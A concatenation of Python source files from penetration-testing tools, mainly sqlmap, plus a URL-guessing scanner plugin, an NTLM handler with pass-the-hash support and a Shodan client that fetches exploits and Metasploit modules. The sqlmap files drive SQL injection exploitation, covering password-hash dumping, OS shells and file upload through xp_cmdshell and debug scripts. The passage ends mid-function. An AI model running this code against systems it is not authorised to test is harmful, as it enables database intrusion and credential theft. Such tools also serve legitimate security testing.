discard_data(m_head_response)
m_get_response = HTTP.get_url(url) # FIXME handle exceptions!
discard_data(m_get_response)
# Check if HEAD reponse is different that GET response, to ensure that results are valids
return "HEAD" if HTTP_response_headers_analyzer(m_head_response.headers, m_get_response.headers) < 0.90 else "GET"
#------------------------------------------------------------------------------
# HTTP response analyzer.
def HTTP_response_headers_analyzer(response_header_1, response_header_2):
"""
Does a HTTP comparison to determinate if two HTTP response matches with the
same content without need the body content. To do that, remove some HTTP headers
(like Date or Cache info).
Return a value between 0-1 with the level of difference. 0 is lowest and 1 the highest.
- If response_header_1 is more similar to response_header_2, value will be near to 100.
- If response_header_1 is more different to response_header_2, value will be near to 0.
:param response_header_1: text with http response headers.
:type response_header_1: http headers
:param response_header_2: text with http response headers.
:type response_header_2: http headers
"""
m_invalid_headers = [
"Date",
"Expires",
"Last-Modified",
]
m_res1 = ''.join([ "%s:%s" % (k,v) for k,v in response_header_1.iteritems() if k not in m_invalid_headers ])
m_res2 = ''.join([ "%s:%s" % (k,v) for k,v in response_header_2.iteritems() if k not in m_invalid_headers ])
return get_diff_ratio(m_res1, m_res2)
#------------------------------------------------------------------------------
def generate_results(unique_texts):
"""
Generates a list of results from a list of URLs as string format.
:param unique_texts: list with a list of URL as string.
:type unique_texts: list(URL)
:return: a list of URL/UrlDiclosure.
:type: list(URL|UrlDiclosure)
"""
# Analyze resutls
m_results = []
m_results_append = m_results.append
for l_match in unique_texts:
#
# Set disclosure vulnerability
l_url = URL(l_match.url)
l_vuln = UrlDisclosure(l_url)
# Set impact
l_vuln.risk = l_match.risk
# Store
m_results_append(l_url)
m_results_append(l_vuln)
return m_results
#------------------------------------------------------------------------------
#
# Mutation functions
#
#------------------------------------------------------------------------------
def make_url_with_prefixes(wordlist, url_parts):
"""
Creates a set of URLs with prefixes.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:returns: a set with urls.
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
m_new = url_parts.copy() # Works with a copy
m_return = set()
m_return_add = m_return.add
m_filename = m_new.filename
for l_suffix in wordlist:
# Format: _.index.php
m_new.filename = "%s_%s" % (l_suffix, m_filename)
m_return_add(m_new.url)
# Format: .index_1.php
m_new.filename = "%s%s" % (l_suffix, m_filename)
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_with_suffixes(wordlist, url_parts):
"""
Creates a set of URLs with suffixes.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:returns: a set with urls.
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
m_new = url_parts.copy() # Works with a copy
m_return = set()
m_return_add = m_return.add
m_filename = m_new.filename
for l_suffix in wordlist:
# Format: index1.php
m_new.filename = m_filename + str(l_suffix)
m_return_add(m_new.url)
# Format: index_1.php
m_new.filename = "%s_%s" % (m_filename, l_suffix)
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_mutate_filename(url_parts):
"""
Creates a set of URLs with mutated filenames.
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:return: a set with URLs
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
# Change extension to upper case
m_new = url_parts.copy()
m_new.all_extensions = m_new.all_extensions.upper()
m_return = set()
m_return_add = m_return.add
m_return_add(m_new.url)
# Adding numeric ends of filename
m_new = url_parts.copy()
filename = m_new.filename
for n in xrange(5):
# Format: index1.php
m_new.filename = filename + str(n)
m_return_add(m_new.url)
# Format: index_1.php
m_new.filename = "%s_%s" % (filename, str(n))
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_changing_folder_name(url_parts):
"""
Creates a set of URLs with prefixes.
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:returns: a set with urls.
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
# Making predictables
m_new = url_parts.copy()
m_return = set()
m_return_add = m_return.add
m_directory = m_new.directory
if len(m_directory.split("/")) > 1:
for n in xrange(20):
m_new.directory = "%s%s" % (m_directory, str(n))
m_return_add(m_new.url)
return m_return
else:
return set()
#------------------------------------------------------------------------------
def make_url_with_files_or_folder(wordlist, url_parts):
"""
Creates a set of URLs with guessed files and subfolders.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:return: a set with URLs
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
m_wordlist_predictable = wordlist['predictable_files']
if not m_wordlist_predictable:
m_wordlist_predictable = set()
m_wordlist_suffix = wordlist['suffixes']
if not m_wordlist_suffix:
m_wordlist_suffix = set()
# Making predictables
m_new = url_parts.copy()
m_return = set()
m_return_add = m_return.add
for l_wordlist in m_wordlist_predictable:
# For errors
if not l_wordlist:
Logger.log_error("Can't load wordlist for category: 'predictable_files'.")
continue
for l_path in l_wordlist:
# Delete wordlist comment lines
if l_path.startswith("#"):
continue
# Fix l_path
l_fixed_path = l_path[1:] if l_path.startswith("/") else l_path
m_new.filename = l_fixed_path
m_return_add(m_new.url)
# For locations source code of application, like:
# www.site.com/folder/app1/ -> www.site.com/folder/app1.war
#
m_new = url_parts.copy()
m_path = m_new.directory
if m_path.endswith('/'):
m_path = m_path[:-1]
for l_wordlist in m_wordlist_suffix:
# For errors
if not l_wordlist:
Logger.log_error("Can't load wordlist for category: 'suffixes'.")
continue
for l_suffix in l_wordlist:
m_new.path = m_path + l_suffix
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_changing_extensions(wordlist, url_parts):
"""
Creates a set of URLs with alternative file extensions.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:return: a set with the URLs
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
# Making predictables
m_new = url_parts.copy()
m_return = set()
m_return_add = m_return.add
for l_suffix in wordlist:
m_new.all_extensions = l_suffix
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def is_folder_url(url_parts):
"""
Determine if the given URL points to a folder or a file:
if URL looks like:
- www.site.com/
- www.site.com
then ==> Return True
if URL looks like:
- www.site.com/index.php
- www.site.com/index.php?id=1&name=bb
- www.site.com/index.php/id=1&name=bb
then ==> Return False
:param url_parts: Parsed URL to test.
:type url_parts: ParsedURL
:return: True if it's a folder, False otherwise.
:rtype: bool
"""
return url_parts.path.endswith('/') and not url_parts.query_char == '/'
#------------------------------------------------------------------------------
def get_list_from_wordlist(wordlist):
"""
Load the content of the wordlist and return a set with the content.
:param wordlist: wordlist name.
:type wordlist: str
:return: a set with the results.
:rtype result_output: set
"""
try:
m_commom_wordlists = set()
for v in Config.plugin_extra_config[wordlist].itervalues():
m_commom_wordlists.update(WordListLoader.get_wordlist_as_list(v))
return m_commom_wordlists
except KeyError,e:
Logger.log_error_more_verbose(str(e))
return set()
```
#### File: thirdparty_libs/requests_ntlm/requests_ntlm.py
```python
from requests.auth import AuthBase
from requests.adapters import HTTPAdapter
from .ntlm import ntlm
class HttpNtlmAuth(AuthBase):
"""HTTP NTLM Authentication Handler for Requests. Supports pass-the-hash."""
def __init__(self, username, password):
"""
:username - Username in 'domain\\username' format
:password - Password or hash in "<PASSWORD>:<PASSWORD>" format.
"""
if ntlm is None:
raise Exception("NTLM libraries unavailable")
#parse the username
user_parts = username.split('\\', 1)
self.domain = user_parts[0].upper()
self.username = user_parts[1]
self.password = password
self.adapter = HTTPAdapter()
def retry_using_http_NTLM_auth(self, auth_header_field, auth_header, response):
"""Attempts to authenticate using HTTP NTLM challenge/response"""
if auth_header in response.request.headers:
return response
request = response.request
# initial auth header with username. will result in challenge
auth = 'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE("%s\\%s" % (self.domain,self.username))
request.headers[auth_header] = auth
# we must keep the connection because NTLM authenticates the connection, not single requests
request.headers["Connection"] = "Keep-Alive"
response2 = self.adapter.send(request)
# this is important for some web applications that store authentication-related info in cookies (it took a long time to figure out)
if response2.headers.get('set-cookie'):
headers['Cookie'] = response2.headers.get('set-cookie')
# get the challenge
auth_header_value = response2.headers[auth_header_field]
ServerChallenge, NegotiateFlags = ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value[5:])
# build response
auth = 'NTLM %s' % ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge, self.username, self.domain, self.password, NegotiateFlags)
request.headers[auth_header] = auth
request.headers["Connection"] = "Close"
response = self.adapter.send(request)
return response
def response_hook(self,r):
if r.status_code == 401 and 'ntlm' in r.headers.get('www-authenticate','').lower():
return self.retry_using_http_NTLM_auth('www-authenticate', 'Authorization', r)
if r.status_code == 407 and 'ntlm' in r.headers.get('proxy-authenticate','').lower():
return self.retry_using_http_NTLM_auth('proxy-authenticate', 'Proxy-authorization', r)
return r
def __call__(self,r):
r.register_hook('response', self.response_hook)
return r
```
#### File: thirdparty_libs/shodan/api.py
```python
try:
from json import dumps, loads
except:
from simplejson import dumps, loads
try:
# Python 2
from urllib2 import urlopen
from urllib import urlencode
except:
# Python 3
from urllib.request import urlopen
from urllib.parse import urlencode
__all__ = ['WebAPI']
class WebAPIError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
class WebAPI:
"""Wrapper around the SHODAN webservices API"""
class Exploits:
def __init__(self, parent):
self.parent = parent
def search(self, query, sources=[], cve=None, osvdb=None, msb=None, bid=None):
"""Search the entire Shodan Exploits archive using the same query syntax
as the website.
Arguments:
query -- exploit search query; same syntax as website
Optional arguments:
sources -- metasploit, cve, osvdb, exploitdb, or packetstorm
cve -- CVE identifier (ex. 2010-0432)
osvdb -- OSVDB identifier (ex. 11666)
msb -- Microsoft Security Bulletin ID (ex. MS05-030)
bid -- Bugtraq identifier (ex. 13951)
"""
if sources:
query += ' source:' + ','.join(sources)
if cve:
query += ' cve:%s' % (str(cve).strip())
if osvdb:
query += ' osvdb:%s' % (str(osvdb).strip())
if msb:
query += ' msb:%s' % (str(msb).strip())
if bid:
query += ' bid:%s' % (str(bid).strip())
return self.parent._request('search_exploits', {'q': query})
class ExploitDb:
def __init__(self, parent):
self.parent = parent
def download(self, id):
"""Download the exploit code from the ExploitDB archive.
Arguments:
id -- ID of the ExploitDB entry
Returns:
A dictionary with the following fields:
filename -- Name of the file
content-type -- Mimetype
data -- Contents of the file
"""
return self.parent._request('exploitdb/download', {'id': id})
def search(self, query, **kwargs):
"""Search the ExploitDB archive.
Arguments:
query -- Search terms
Optional arguments:
author -- Name of the exploit submitter
platform -- Target platform (e.g. windows, linux, hardware etc.)
port -- Service port number
type -- Any, dos, local, papers, remote, shellcode and webapps
Returns:
A dictionary with 2 main items: matches (list) and total (int).
Each item in 'matches' is a dictionary with the following elements:
id
author
date
description
platform
port
type
"""
return self.parent._request('exploitdb/search', dict(q=query, **kwargs))
class Msf:
def __init__(self, parent):
self.parent = parent
def download(self, id):
"""Download a metasploit module given the fullname (id) of it.
Arguments:
id -- fullname of the module (ex. auxiliary/admin/backupexec/dump)
Returns:
A dictionary with the following fields:
filename -- Name of the file
content-type -- Mimetype
data -- File content
"""
return self.parent._request('msf/download', {'id': id})
def search(self, query, **kwargs):
"""Search for a Metasploit module.
"""
return self.parent._request('msf/search', dict(q=query, **kwargs))
def __init__(self, key):
"""Initializes the API object.
Arguments:
key -- your API key
"""
self.api_key = key
self.base_url = 'http://www.shodanhq.com/api/'
self.exploits = self.Exploits(self)
self.exploitdb = self.ExploitDb(self)
self.msf = self.Msf(self)
def _request(self, function, params):
"""General-purpose function to create web requests to SHODAN.
Arguments:
function -- name of the function you want to execute
params -- dictionary of parameters for the function
Returns
A JSON string containing the function's results.
"""
# Add the API key parameter automatically
params['key'] = self.api_key
# Send the request
data = urlopen(self.base_url + function + '?' + urlencode(params)).read().decode('utf-8')
# Parse the text into JSON
data = loads(data)
# Raise an exception if an error occurred
if data.get('error', None):
raise WebAPIError(data['error'])
# Return the data
return data
def count(self, query):
"""Returns the total number of search results for the query.
"""
return self._request('count', {'q': query})
def locations(self, query):
"""Return a break-down of all the countries and cities that the results for
the given search are located in.
"""
return self._request('locations', {'q': query})
def fingerprint(self, banner):
"""Determine the software based on the banner.
Arguments:
banner - HTTP banner
Returns:
A list of software that matched the given banner.
"""
return self._request('fingerprint', {'banner': banner})
def host(self, ip):
"""Get all available information on an IP.
Arguments:
ip -- IP of the computer
Returns:
All available information SHODAN has on the given IP,
subject to API key restrictions.
"""
return self._request('host', {'ip': ip})
def info(self):
"""Returns information about the current API key, such as a list of add-ons
and other features that are enabled for the current user's API plan.
"""
return self._request('info', {})
def search(self, query, page=1, limit=None, offset=None):
"""Search the SHODAN database.
Arguments:
query -- search query; identical syntax to the website
Optional arguments:
page -- page number of the search results
limit -- number of results to return
offset -- search offset to begin getting results from
Returns:
A dictionary with 3 main items: matches, countries and total.
Visit the website for more detailed information.
"""
args = {
'q': query,
'p': page,
}
if limit:
args['l'] = limit
if offset:
args['o'] = offset
return self._request('search', args)
```
#### File: thirdparty_libs/shodan/export.py
```python
import sys
from datetime import datetime
from xml.sax import make_parser, handler
# Type conversion helper functions
def parse_date(args):
return datetime.strptime(args, '%d.%m.%Y')
class ExportSaxParser(handler.ContentHandler):
"""Parses Shodan's export XML file and executes the callback for each
entry.
"""
# Callbacks
entry_cb = None
# Keep track of where we're at
_in_host = False
_in_data = False
_host = None
_data = u''
# Conversion schemas
_host_attr_schema = {
'port': int,
'updated': parse_date,
}
def __init__(self, entry_cb=None):
# Define the callbacks
self.entry_cb = entry_cb
# ContentHandler methods
def startElement(self, name, attrs):
if name =='host':
# Extract all the attribute information
self._host = {}
for (name, value) in attrs.items():
# Convert the field to a native type if it's defined in the schema
self._host[name] = self._host_attr_schema.get(name, lambda x: x)(value)
# Update the state machine
self._in_host = True
elif name == 'data':
self._in_data = True
self._data = u''
def endElement(self, name):
if name == 'host':
# Execute the callback
self.entry_cb(self._host)
# Update the state machine
self._in_host = False
elif name == 'data':
self._host['data'] = self._data
self._in_data = False
def characters(self, content):
if self._in_data:
self._data += content
class ExportParser(object):
entry_cb = None
def __init__(self, entry_cb=None):
self.entry_cb = entry_cb
def parse(self, filename):
parser = make_parser()
parser.setContentHandler(ExportSaxParser(self.entry_cb))
parser.parse(filename)
if __name__ == '__main__':
def test_cb(entry):
print entry
import sys
parser = ExportParser(test_cb)
parser.parse(sys.argv[1])
```
#### File: thirdparty_libs/snakemq/poll.py
```python
import select
import time
#########################################################################
if not hasattr(select, "epoll"):
select.EPOLLIN = 1
select.EPOLLOUT = 4
select.EPOLLERR = 8
select.EPOLLHUP = 16
#########################################################################
class SelectPoll(object):
def __init__(self):
self.fds = {}
def register(self, fd, eventmask=select.EPOLLIN | select.EPOLLOUT):
self.fds[fd] = eventmask
def unregister(self, fd):
try:
del self.fds[fd]
except KeyError:
pass
def modify(self, fd, eventmask):
self.fds[fd] = eventmask
@staticmethod
def _socket_to_fd(obj):
"""
convert a socket-like object to a file descriptor
"""
if hasattr(obj, "fileno"):
fd = obj.fileno()
else:
fd = obj
return fd
def poll(self, timeout):
"""
@param timeout: seconds
"""
if len(self.fds) == 0:
time.sleep(timeout)
return []
rlist = []
wlist = []
xlist = []
for fd, mask in self.fds.items():
fd = self._socket_to_fd(fd)
if mask & select.EPOLLIN:
rlist.append(fd)
if mask & select.EPOLLOUT:
wlist.append(fd)
xlist.append(fd)
rlist, wlist, xlist = select.select(rlist, wlist, xlist, timeout)
res = {}
for fd in rlist:
res[fd] = res.get(fd, 0) | select.EPOLLIN
for fd in wlist:
res[fd] = res.get(fd, 0) | select.EPOLLOUT
for fd in xlist:
res[fd] = res.get(fd, 0) | select.EPOLLERR
return res.items()
#########################################################################
if hasattr(select, "epoll"):
poll = select.epoll
else:
poll = SelectPoll
```
#### File: extra/beep/beep.py
```python
import os
import subprocess
import sys
import wave
BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
def beep():
try:
if subprocess.mswindows:
_win_wav_play(BEEP_WAV_FILENAME)
elif sys.platform == "darwin":
_mac_beep()
elif sys.platform == "linux2":
_linux_wav_play(BEEP_WAV_FILENAME)
else:
_speaker_beep()
except:
_speaker_beep()
def _speaker_beep():
sys.stdout.write('\a') # doesn't work on modern Linux systems
try:
sys.stdout.flush()
except IOError:
pass
def _mac_beep():
import Carbon.Snd
Carbon.Snd.SysBeep(1)
def _win_wav_play(filename):
import winsound
winsound.PlaySound(filename, winsound.SND_FILENAME)
def _linux_wav_play(filename):
import ctypes
PA_STREAM_PLAYBACK = 1
PA_SAMPLE_S16LE = 3
BUFFSIZE = 1024
class struct_pa_sample_spec(ctypes.Structure):
_fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
wave_file = wave.open(filename, "rb")
pa_sample_spec = struct_pa_sample_spec()
pa_sample_spec.rate = wave_file.getframerate()
pa_sample_spec.channels = wave_file.getnchannels()
pa_sample_spec.format = PA_SAMPLE_S16LE
error = ctypes.c_int(0)
pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
if not pa_stream:
raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
while True:
latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
if latency == -1:
raise Exception("Getting latency failed")
buf = wave_file.readframes(BUFFSIZE)
if not buf:
break
if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
raise Exception("Could not play file")
wave_file.close()
if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
raise Exception("Could not simple drain")
pa.pa_simple_free(pa_stream)
if __name__ == "__main__":
beep()
```
#### File: lib/controller/action.py
```python
from lib.controller.handler import setHandler
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import CONTENT_TYPE
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
def action():
"""
This function exploit the SQL injection on the affected
URL parameter and extract requested data from the
back-end database management system or operating system
if possible
"""
# First of all we have to identify the back-end database management
# system to be able to go ahead with the injection
setHandler()
if not Backend.getDbms() or not conf.dbmsHandler:
htmlParsed = Format.getErrorParsedDBMSes()
errMsg = "sqlmap was not able to fingerprint the "
errMsg += "back-end database management system"
if htmlParsed:
errMsg += ", but from the HTML error page it was "
errMsg += "possible to determinate that the "
errMsg += "back-end DBMS is %s" % htmlParsed
if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
errMsg += ". Do not specify the back-end DBMS manually, "
errMsg += "sqlmap will fingerprint the DBMS for you"
elif kb.nullConnection:
errMsg += ". You can try to rerun without using optimization "
errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
else:
errMsg += ". Support for this DBMS will be implemented at "
errMsg += "some point"
raise SqlmapUnsupportedDBMSException(errMsg)
conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
# Enumeration options
if conf.getBanner:
conf.dumper.banner(conf.dbmsHandler.getBanner())
if conf.getCurrentUser:
conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
if conf.getCurrentDb:
conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
if conf.getHostname:
conf.dumper.hostname(conf.dbmsHandler.getHostname())
if conf.isDba:
conf.dumper.dba(conf.dbmsHandler.isDba())
if conf.getUsers:
conf.dumper.users(conf.dbmsHandler.getUsers())
if conf.getPasswordHashes:
try:
conf.dumper.userSettings("database management system users password hashes",
conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
raise
if conf.getPrivileges:
try:
conf.dumper.userSettings("database management system users privileges",
conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
raise
if conf.getRoles:
try:
conf.dumper.userSettings("database management system users roles",
conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
raise
if conf.getDbs:
conf.dumper.dbs(conf.dbmsHandler.getDbs())
if conf.getTables:
conf.dumper.dbTables(conf.dbmsHandler.getTables())
if conf.commonTables:
conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))
if conf.getSchema:
conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)
if conf.getColumns:
conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)
if conf.getCount:
conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())
if conf.commonColumns:
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))
if conf.dumpTable:
conf.dbmsHandler.dumpTable()
if conf.dumpAll:
conf.dbmsHandler.dumpAll()
if conf.search:
conf.dbmsHandler.search()
if conf.query:
conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
if conf.sqlShell:
conf.dbmsHandler.sqlShell()
if conf.sqlFile:
conf.dbmsHandler.sqlFile()
# User-defined function options
if conf.udfInject:
conf.dbmsHandler.udfInjectCustom()
# File system options
if conf.rFile:
conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
if conf.wFile:
conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
# Operating system options
if conf.osCmd:
conf.dbmsHandler.osCmd()
if conf.osShell:
conf.dbmsHandler.osShell()
if conf.osPwn:
conf.dbmsHandler.osPwn()
if conf.osSmb:
conf.dbmsHandler.osSmb()
if conf.osBof:
conf.dbmsHandler.osBof()
# Windows registry options
if conf.regRead:
conf.dumper.registerValue(conf.dbmsHandler.regRead())
if conf.regAdd:
conf.dbmsHandler.regAdd()
if conf.regDel:
conf.dbmsHandler.regDel()
# Miscellaneous options
if conf.cleanup:
conf.dbmsHandler.cleanup()
if conf.direct:
conf.dbmsConnector.close()
```
#### File: lib/core/convert.py
```python
import json
import pickle
import sys
from lib.core.settings import IS_WIN
from lib.core.settings import UNICODE_ENCODING
def base64decode(value):
"""
Decodes string value from Base64 to plain format
>>> base64decode('Zm9vYmFy')
'foobar'
"""
return value.decode("base64")
def base64encode(value):
"""
Encodes string value from plain to Base64 format
>>> base64encode('foobar')
'Zm9vYmFy'
"""
return value.encode("base64")[:-1].replace("\n", "")
def base64pickle(value):
"""
Serializes (with pickle) and encodes to Base64 format supplied (binary) value
>>> base64pickle('foobar')
'gAJVBmZvb2JhcnEALg=='
"""
retVal = None
try:
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
except:
warnMsg = "problem occurred while serializing "
warnMsg += "instance of a type '%s'" % type(value)
singleTimeWarnMessage(warnMsg)
retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
return retVal
def base64unpickle(value):
"""
Decodes value from Base64 to plain format and deserializes (with pickle) its content
>>> base64unpickle('gAJVBmZvb2JhcnEALg==')
'foobar'
"""
return pickle.loads(base64decode(value))
def hexdecode(value):
"""
Decodes string value from hex to plain format
>>> hexdecode('666f6f626172')
'foobar'
"""
value = value.lower()
return (value[2:] if value.startswith("0x") else value).decode("hex")
def hexencode(value):
"""
Encodes string value from plain to hex format
>>> hexencode('foobar')
'666f6f626172'
"""
return utf8encode(value).encode("hex")
def unicodeencode(value, encoding=None):
"""
Returns 8-bit string representation of the supplied unicode value
>>> unicodeencode(u'foobar')
'foobar'
"""
retVal = value
if isinstance(value, unicode):
try:
retVal = value.encode(encoding or UNICODE_ENCODING)
except UnicodeEncodeError:
retVal = value.encode(UNICODE_ENCODING, "replace")
return retVal
def utf8encode(value):
"""
Returns 8-bit string representation of the supplied UTF-8 value
>>> utf8encode(u'foobar')
'foobar'
"""
return unicodeencode(value, "utf-8")
def utf8decode(value):
"""
Returns UTF-8 representation of the supplied 8-bit string representation
>>> utf8decode('foobar')
u'foobar'
"""
return value.decode("utf-8")
def htmlunescape(value):
"""
Returns (basic conversion) HTML unescaped value
>>> htmlunescape('a<b')
'a<b'
"""
retVal = value
if value and isinstance(value, basestring):
codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&'))
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
return retVal
def singleTimeWarnMessage(message): # Cross-linked function
raise NotImplementedError
def stdoutencode(data):
retVal = None
try:
# Reference: http://bugs.python.org/issue1602
if IS_WIN:
output = data.encode("ascii", "replace")
if output != data:
warnMsg = "cannot properly display Unicode characters "
warnMsg += "inside Windows OS command prompt "
warnMsg += "(http://bugs.python.org/issue1602). All "
warnMsg += "unhandled occurances will result in "
warnMsg += "replacement with '?' character. Please, find "
warnMsg += "proper character representation inside "
warnMsg += "corresponding output files. "
singleTimeWarnMessage(warnMsg)
retVal = output
else:
retVal = data.encode(sys.stdout.encoding)
except:
retVal = data.encode(UNICODE_ENCODING)
return retVal
def jsonize(data):
"""
Returns JSON serialized data
>>> jsonize({'foo':'bar'})
'{\\n "foo": "bar"\\n}'
"""
return json.dumps(data, sort_keys=False, indent=4)
def dejsonize(data):
"""
Returns JSON deserialized data
>>> dejsonize('{\\n "foo": "bar"\\n}')
{u'foo': u'bar'}
"""
return json.loads(data)
```
#### File: lib/parse/payloads.py
```python
from xml.etree import ElementTree as et
from lib.core.data import conf
from lib.core.data import paths
from lib.core.datatype import AttribDict
def cleanupVals(text, tag):
if tag in ("clause", "where"):
text = text.split(',')
if isinstance(text, basestring):
text = int(text) if text.isdigit() else str(text)
elif isinstance(text, list):
count = 0
for _ in text:
text[count] = int(_) if _.isdigit() else str(_)
count += 1
if len(text) == 1 and tag not in ("clause", "where"):
text = text[0]
return text
def parseXmlNode(node):
for element in node.getiterator('boundary'):
boundary = AttribDict()
for child in element.getchildren():
if child.text:
values = cleanupVals(child.text, child.tag)
boundary[child.tag] = values
else:
boundary[child.tag] = None
conf.boundaries.append(boundary)
for element in node.getiterator('test'):
test = AttribDict()
for child in element.getchildren():
if child.text and child.text.strip():
values = cleanupVals(child.text, child.tag)
test[child.tag] = values
else:
if len(child.getchildren()) == 0:
test[child.tag] = None
continue
else:
test[child.tag] = AttribDict()
for gchild in child.getchildren():
if gchild.tag in test[child.tag]:
prevtext = test[child.tag][gchild.tag]
test[child.tag][gchild.tag] = [prevtext, gchild.text]
else:
test[child.tag][gchild.tag] = gchild.text
conf.tests.append(test)
def loadPayloads():
doc = et.parse(paths.PAYLOADS_XML)
root = doc.getroot()
parseXmlNode(root)
```
#### File: dbms/mssqlserver/filesystem.py
```python
import ntpath
import os
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def _dataToScr(self, fileContent, chunkName):
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = hexencode(lineChar)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar
lineAddr += len(lineChar)
fileLines.append(scrString)
fileLines.append("w")
fileLines.append("q")
return fileLines
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
return chunkName
def stackedReadFile(self, rFile):
infoMsg = "fetching file: '%s'" % rFile
logger.info(infoMsg)
result = []
txtTbl = self.fileTblName
hexTbl = "%shex" % self.fileTblName
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
